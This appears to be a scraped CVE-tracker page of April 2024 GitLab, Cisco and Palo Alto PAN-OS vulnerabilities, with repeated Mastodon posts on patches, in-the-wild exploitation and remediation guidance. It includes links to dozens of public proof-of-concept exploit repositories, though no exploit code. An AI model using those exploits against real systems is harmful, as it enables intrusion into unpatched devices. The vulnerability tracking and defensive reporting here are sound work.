EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:

cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC

##

CVE-2024-4006
(4.3 MEDIUM)

EPSS: 0.04%

updated 2024-04-25T17:25:05.903000

2 posts

An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.7 before 16.9.6, all versions starting from 16.10 before 16.10.4, all versions starting from 16.11 before 16.11.1 where personal access scopes were not honored by GraphQL subscriptions

screaminggoat at 2024-04-26T16:49:09.826Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

##

screaminggoat@infosec.exchange at 2024-04-26T16:49:09.000Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347

##

CVE-2024-4024
(7.3 HIGH)

EPSS: 0.04%

updated 2024-04-25T15:30:38

2 posts

An issue has been discovered in GitLab CE/EE affecting all versions starting from 7.8 before 16.9.6, all versions starting from 16.10 before 16.10.4, all versions starting from 16.11 before 16.11.1. Under certain conditions, an attacker with their Bitbucket account credentials may be able to take over a GitLab account linked to another user's Bitbucket account, if Bitbucket is used as an OAuth 2.0

screaminggoat at 2024-04-26T16:49:09.826Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

##

screaminggoat@infosec.exchange at 2024-04-26T16:49:09.000Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347

##

CVE-2024-2434
(8.5 HIGH)

EPSS: 0.04%

updated 2024-04-25T13:18:02.660000

2 posts

An issue has been discovered in GitLab affecting all versions of GitLab CE/EE 16.9 prior to 16.9.6, 16.10 prior to 16.10.4, and 16.11 prior to 16.11.1 where path traversal could lead to DoS and restricted file read.

screaminggoat at 2024-04-26T16:49:09.826Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

##

screaminggoat@infosec.exchange at 2024-04-26T16:49:09.000Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347

##

CVE-2024-1347
(4.3 MEDIUM)

EPSS: 0.04%

updated 2024-04-25T12:30:56

2 posts

An issue has been discovered in GitLab CE/EE affecting all versions before 16.9.6, all versions starting from 16.10 before 16.10.4, all versions starting from 16.11 before 16.11.1. Under certain conditions, an attacker through a crafted email address may be able to bypass domain based restrictions on an instance or a group.

screaminggoat at 2024-04-26T16:49:09.826Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

##

screaminggoat@infosec.exchange at 2024-04-26T16:49:09.000Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347

##

CVE-2024-2829
(7.5 HIGH)

EPSS: 0.04%

updated 2024-04-25T12:30:51

2 posts

An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.5 before 16.9.6, all versions starting from 16.10 before 16.10.4, all versions starting from 16.11 before 16.11.1. A crafted wildcard filter in FileFinder may lead to a denial of service.

screaminggoat at 2024-04-26T16:49:09.826Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

##

screaminggoat@infosec.exchange at 2024-04-26T16:49:09.000Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347

##

CVE-2024-20358
(6.0 MEDIUM)

EPSS: 0.04%

updated 2024-04-24T21:31:56

4 posts

A vulnerability in the Cisco Adaptive Security Appliance (ASA) restore functionality that is available in Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system with root-level privileges. Administrator-level privileges are required to exploit this vulnerability. This vulnera

h4sh at 2024-04-26T02:00:08.232Z ##

Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.

They don't know how the attackers initially got in.

Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":

> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.

cyber.gc.ca/en/news-events/cyb

blog.talosintelligence.com/arc

##

screaminggoat at 2024-04-24T20:18:30.442Z ##

While Cisco's Event Response lists CVE-2024-20358 as "leveraged in these attacks," its own security advisory states:

The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

🔗 CVE-2024-20358 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability

CISA's RSS feed showed that the security alert for the KEV additions created at 0800 ET, meaning it was coordinated and prepared in advance of Cisco's announcements. Because CISA only added the other two Cisco vulnerabilities, CVE-2024-20358 does not appear to be a known exploited vulnerability.

##

h4sh@infosec.exchange at 2024-04-26T02:00:08.000Z ##

Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.

They don't know how the attackers initially got in.

Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":

> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.

cyber.gc.ca/en/news-events/cyb

blog.talosintelligence.com/arc

##

screaminggoat@infosec.exchange at 2024-04-24T20:18:30.000Z ##

While Cisco's Event Response lists CVE-2024-20358 as "leveraged in these attacks," its own security advisory states:

The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

🔗 CVE-2024-20358 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability

CISA's RSS feed showed that the security alert for the KEV additions created at 0800 ET, meaning it was coordinated and prepared in advance of Cisco's announcements. Because CISA only added the other two Cisco vulnerabilities, CVE-2024-20358 does not appear to be a known exploited vulnerability.

#Cisco #vulnerability #CVE_2024_202358 #ASA

##

CVE-2024-20356
(8.7 HIGH)

EPSS: 0.04%

updated 2024-04-24T21:31:56

6 posts

A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) could allow an authenticated, remote attacker with Administrator-level privileges to perform command injection attacks on an affected system and elevate their privileges to root. This vulnerability is due to insufficient user input validation. An attacker could exploit this vulnerability by sendin

1 repos

https://github.com/nettitude/CVE-2024-20356

decio at 2024-04-23T09:01:16.415Z ##

IMO on tient ici un des plus beaux descriptifs/blog post technique de l'année sur l'exploitation de la vulnérabilité CVE-2024-20356 (web-GUI Cisco IMC ) :

✅ Complet
✅ Précis
🛠️ Toolkit disponible sur GitHub
😄 ...et amusant !

𝕮𝖆𝖓 𝖎𝖙 𝖗𝖚𝖓 𝕯𝖔𝖔𝖒?

(constat: ces "appliances" sont de vrais 🧀 )
👇
labs.nettitude.com/blog/cve-20

##

Polynomial_C@mastodon.social at 2024-04-22T18:23:28.000Z ##

labs.nettitude.com/blog/cve-20

"Jailbreaking a Cisco appliance to run DOOM"

##

decio@infosec.exchange at 2024-04-23T09:01:16.000Z ##

IMO on tient ici un des plus beaux descriptifs/blog post technique de l'année sur l'exploitation de la vulnérabilité CVE-2024-20356 (web-GUI Cisco IMC ) :

✅ Complet
✅ Précis
🛠️ Toolkit disponible sur GitHub
😄 ...et amusant !

𝕮𝖆𝖓 𝖎𝖙 𝖗𝖚𝖓 𝕯𝖔𝖔𝖒?

(constat: ces "appliances" sont de vrais 🧀 )
👇
labs.nettitude.com/blog/cve-20

##

Polynomial_C@mastodon.social at 2024-04-22T18:23:28.000Z ##

labs.nettitude.com/blog/cve-20

"Jailbreaking a Cisco appliance to run DOOM"

##

campuscodi@mastodon.social at 2024-04-21T11:50:32.000Z ##

Researchers at Nettitude Labs have published a write-up and PoC for CVE-2024-20356.

This is a command injection vulnerability in the web interface of the Cisco IMC servers that can be used by authenticated attackers to gain root privileges on the device.

Nettitude used the bug to install and play DOOM on the device. Cisco patched the vulnerability last week.

labs.nettitude.com/blog/cve-20

github.com/nettitude/CVE-2024-

sec.cloudapps.cisco.com/securi

##

raptor@infosec.exchange at 2024-04-20T16:07:30.000Z ##

CVE-2024-20356: Jailbreaking a #Cisco appliance to run DOOM #ciscown

labs.nettitude.com/blog/cve-20

github.com/nettitude/CVE-2024-

##

CVE-2024-3400
(10.0 CRITICAL)

EPSS: 95.36%

updated 2024-04-23T19:57:25.207000

39 posts

A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

Nuclei template

33 repos

https://github.com/AdaniKamal/CVE-2024-3400

https://github.com/CONDITIONBLACK/CVE-2024-3400-POC

https://github.com/LoanVitor/CVE-2024-3400-

https://github.com/W01fh4cker/CVE-2024-3400-RCE-Scan

https://github.com/marconesler/CVE-2024-3400

https://github.com/hahasagined/CVE-2024-3400

https://github.com/zam89/CVE-2024-3400-pot

https://github.com/Kr0ff/cve-2024-3400

https://github.com/FoxyProxys/CVE-2024-3400

https://github.com/HackingLZ/panrapidcheck

https://github.com/ihebski/CVE-2024-3400

https://github.com/CerTusHack/CVE-2024-3400-PoC

https://github.com/codeblueprint/CVE-2024-3400

https://github.com/ak1t4/CVE-2024-3400

https://github.com/0x0d3ad/CVE-2024-3400

https://github.com/momika233/CVE-2024-3400

https://github.com/stronglier/CVE-2024-3400

https://github.com/sxyrxyy/CVE-2024-3400-Check

https://github.com/pwnj0hn/CVE-2024-3400

https://github.com/retkoussa/CVE-2024-3400

https://github.com/0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection

https://github.com/index2014/CVE-2024-3400-Checker

https://github.com/h4x0r-dz/CVE-2024-3400

https://github.com/Yuvvi01/CVE-2024-3400

https://github.com/Ravaan21/CVE-2024-3400

https://github.com/schooldropout1337/CVE-2024-3400

https://github.com/ZephrFish/CVE-2024-3400-Canary

https://github.com/MrR0b0t19/CVE-2024-3400

https://github.com/terminalJunki3/CVE-2024-3400-Checker

https://github.com/MurrayR0123/CVE-2024-3400-Compromise-Checker

https://github.com/phantomradar/cve-2024-3400-poc

https://github.com/swaybs/CVE-2024-3400

https://github.com/Chocapikk/CVE-2024-3400

screaminggoat at 2024-04-29T19:44:07.390Z ##

Palo Alto Networks updated their security advisory for CVE-2024-3400:

We are also aware of proof-of-concept by third parties of post-exploit persistence techniques that survive resets and upgrades. We are not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.

This renders their Remediation Guide moot as their recommended action for "Level 3 interactive access" is Update to the latest PAN-OS hotfix and perform a Factory Reset.

Waiting for them to update the KB article to recommend disconnecting the PAN-OS and yeeting it into the sun. 🌞cc: @todb

##

screaminggoat at 2024-04-26T16:34:39.118Z ##

Palto Alto Networks: How to Remedy CVE-2024-3400
So Palo Alto Networks has an actual remediation (read: incident response) knowledge base article for CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 as an exploited zero-day), "based on the current view of the most effective and least disruptive remediation for customers." Their guidance is simple:

  • Level 0 Probe: Unsuccessful exploitation attempt: No indication of compromise = apply hotfix patch
  • Level 1 Test: 0-byte file has been created and is resident on the firewall: still not compromised = apply hotfix patch
  • Level 2 Potential Exfiltration: File on the device has been copied to a location accessible via a web request (common IOC: running_config.xml): apply hotfix patch and perform private data reset (NOTE: PAN states suggested remediation will eliminate the possibility of capturing forensic artifacts)
  • Level 3 Interactive access: Interactive command execution: apply hotfix patch and factory reset.

It's implied that the threat actor would move laterally from the compromised device and establish persistence (additional backdoors, etc.) so threat hunting and containment should be prioritized.

##

screaminggoat at 2024-04-23T20:37:13.723Z ##

You'd expect a government advisory to contain timely and reliable information. NCSC-UK warned about CVE-2024-3400 ten days after infosec publications broke the news. This advisory was difficult to locate even on their homepage. They only mention Unit 42 and Palo Alto Networks' blogs, not Volexity's. Nothing about indicators of compromise either. Their mitigation section sounds as though all available hotfixes weren't released already (they were). The only noteworthy statement is that "Palo Alto Networks is aware of increasing exploitation of this vulnerability. Proof of concepts for this vulnerability have been publicly disclosed by third parties."🔗 ncsc.gov.uk/news/exploitation-

##

screaminggoat at 2024-04-23T11:44:32.227Z ##

Hold onto your Industrial Control Systems! Security Week reports that Siemens Ruggedcom APE1808 configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). "Siemens is preparing updates and recommends specific countermeasures for products where updates are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications." 🔗 securityweek.com/siemens-indus and advisory cert-portal.siemens.com/produc

##

Walker at 2024-04-23T01:38:04.983Z ##

I would like to thank the script kiddies using base64 encoded commands attempting to compromise

It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.

##

screaminggoat at 2024-04-20T12:58:43.433Z ##

Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗paloaltonetworks.com/blog/2024

##

screaminggoat@infosec.exchange at 2024-04-29T19:44:07.000Z ##

Palo Alto Networks updated their security advisory for CVE-2024-3400:

We are also aware of proof-of-concept by third parties of post-exploit persistence techniques that survive resets and upgrades. We are not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.

This renders their Remediation Guide moot as their recommended action for "Level 3 interactive access" is Update to the latest PAN-OS hotfix and perform a Factory Reset.

Waiting for them to update the KB article to recommend disconnecting the PAN-OS and yeeting it into the sun. 🌞cc: @todb

#CVE_2024_3400 #PaloAltoNetworks #eitw #activeexploitation #proofofconcept #poc #DFIR

##

screaminggoat@infosec.exchange at 2024-04-26T16:34:39.000Z ##

Palto Alto Networks: How to Remedy CVE-2024-3400
So Palo Alto Networks has an actual remediation (read: incident response) knowledge base article for CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 as an exploited zero-day), "based on the current view of the most effective and least disruptive remediation for customers." Their guidance is simple:

  • Level 0 Probe: Unsuccessful exploitation attempt: No indication of compromise = apply hotfix patch
  • Level 1 Test: 0-byte file has been created and is resident on the firewall: still not compromised = apply hotfix patch
  • Level 2 Potential Exfiltration: File on the device has been copied to a location accessible via a web request (common IOC: running_config.xml): apply hotfix patch and perform private data reset (NOTE: PAN states suggested remediation will eliminate the possibility of capturing forensic artifacts)
  • Level 3 Interactive access: Interactive command execution: apply hotfix patch and factory reset.

It's implied that the threat actor would move laterally from the compromised device and establish persistence (additional backdoors, etc.) so threat hunting and containment should be prioritized.

#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #DFIR

##

screaminggoat@infosec.exchange at 2024-04-23T11:44:32.000Z ##

Hold onto your Industrial Control Systems! Security Week reports that Siemens Ruggedcom APE1808 configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). "Siemens is preparing updates and recommends specific countermeasures for products where updates are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications." 🔗 securityweek.com/siemens-indus and advisory cert-portal.siemens.com/produc

#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #Siemens #ICS

##

Walker@infosec.exchange at 2024-04-23T01:38:04.000Z ##

I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400

It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.

#cyberchef #Panos #cve20243400

##

simontsui@infosec.exchange at 2024-04-20T12:58:43.000Z ##

Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗paloaltonetworks.com/blog/2024

#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #PANOS #IOC

##

Walker at 2024-04-23T01:38:04.983Z ##

I would like to thank the script kiddies using base64 encoded commands attempting to compromise

It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.

##

Walker@infosec.exchange at 2024-04-23T01:38:04.000Z ##

I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400

It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.

#cyberchef #Panos #cve20243400

##

screaminggoat at 2024-04-29T19:44:07.390Z ##

Palo Alto Networks updated their security advisory for CVE-2024-3400:

We are also aware of proof-of-concept by third parties of post-exploit persistence techniques that survive resets and upgrades. We are not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.

This renders their Remediation Guide moot as their recommended action for "Level 3 interactive access" is Update to the latest PAN-OS hotfix and perform a Factory Reset.

Waiting for them to update the KB article to recommend disconnecting the PAN-OS and yeeting it into the sun. 🌞cc: @todb

##

screaminggoat at 2024-04-26T16:34:39.118Z ##

Palto Alto Networks: How to Remedy CVE-2024-3400
So Palo Alto Networks has an actual remediation (read: incident response) knowledge base article for CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 as an exploited zero-day), "based on the current view of the most effective and least disruptive remediation for customers." Their guidance is simple:

  • Level 0 Probe: Unsuccessful exploitation attempt: No indication of compromise = apply hotfix patch
  • Level 1 Test: 0-byte file has been created and is resident on the firewall: still not compromised = apply hotfix patch
  • Level 2 Potential Exfiltration: File on the device has been copied to a location accessible via a web request (common IOC: running_config.xml): apply hotfix patch and perform private data reset (NOTE: PAN states suggested remediation will eliminate the possibility of capturing forensic artifacts)
  • Level 3 Interactive access: Interactive command execution: apply hotfix patch and factory reset.

It's implied that the threat actor would move laterally from the compromised device and establish persistence (additional backdoors, etc.) so threat hunting and containment should be prioritized.

##

screaminggoat at 2024-04-23T20:37:13.723Z ##

You'd expect a government advisory to contain timely and reliable information. NCSC-UK warned about CVE-2024-3400 ten days after infosec publications broke the news. This advisory was difficult to locate even on their homepage. They only mention Unit 42 and Palo Alto Networks' blogs, not Volexity's. Nothing about indicators of compromise either. Their mitigation section sounds as though all available hotfixes weren't released already (they were). The only noteworthy statement is that "Palo Alto Networks is aware of increasing exploitation of this vulnerability. Proof of concepts for this vulnerability have been publicly disclosed by third parties."🔗 ncsc.gov.uk/news/exploitation-

##

screaminggoat at 2024-04-23T11:44:32.227Z ##

Hold onto your Industrial Control Systems! Security Week reports that Siemens Ruggedcom APE1808 configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). "Siemens is preparing updates and recommends specific countermeasures for products where updates are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications." 🔗 securityweek.com/siemens-indus and advisory cert-portal.siemens.com/produc

##

Walker at 2024-04-23T01:38:04.983Z ##

I would like to thank the script kiddies using base64 encoded commands attempting to compromise

It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.

##

screaminggoat at 2024-04-20T12:58:43.433Z ##

Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗paloaltonetworks.com/blog/2024

##

screaminggoat@infosec.exchange at 2024-04-29T19:44:07.000Z ##

Palo Alto Networks updated their security advisory for CVE-2024-3400:

We are also aware of proof-of-concept by third parties of post-exploit persistence techniques that survive resets and upgrades. We are not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.

This renders their Remediation Guide moot as their recommended action for "Level 3 interactive access" is Update to the latest PAN-OS hotfix and perform a Factory Reset.

Waiting for them to update the KB article to recommend disconnecting the PAN-OS and yeeting it into the sun. 🌞cc: @todb

#CVE_2024_3400 #PaloAltoNetworks #eitw #activeexploitation #proofofconcept #poc #DFIR

##

screaminggoat@infosec.exchange at 2024-04-26T16:34:39.000Z ##

Palto Alto Networks: How to Remedy CVE-2024-3400
So Palo Alto Networks has an actual remediation (read: incident response) knowledge base article for CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 as an exploited zero-day), "based on the current view of the most effective and least disruptive remediation for customers." Their guidance is simple:

  • Level 0 Probe: Unsuccessful exploitation attempt: No indication of compromise = apply hotfix patch
  • Level 1 Test: 0-byte file has been created and is resident on the firewall: still not compromised = apply hotfix patch
  • Level 2 Potential Exfiltration: File on the device has been copied to a location accessible via a web request (common IOC: running_config.xml): apply hotfix patch and perform private data reset (NOTE: PAN states suggested remediation will eliminate the possibility of capturing forensic artifacts)
  • Level 3 Interactive access: Interactive command execution: apply hotfix patch and factory reset.

It's implied that the threat actor would move laterally from the compromised device and establish persistence (additional backdoors, etc.) so threat hunting and containment should be prioritized.

#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #DFIR

##

screaminggoat@infosec.exchange at 2024-04-23T11:44:32.000Z ##

Hold onto your Industrial Control Systems! Security Week reports that Siemens Ruggedcom APE1808 configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). "Siemens is preparing updates and recommends specific countermeasures for products where updates are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications." 🔗 securityweek.com/siemens-indus and advisory cert-portal.siemens.com/produc

#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #Siemens #ICS

##

Walker@infosec.exchange at 2024-04-23T01:38:04.000Z ##

I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400

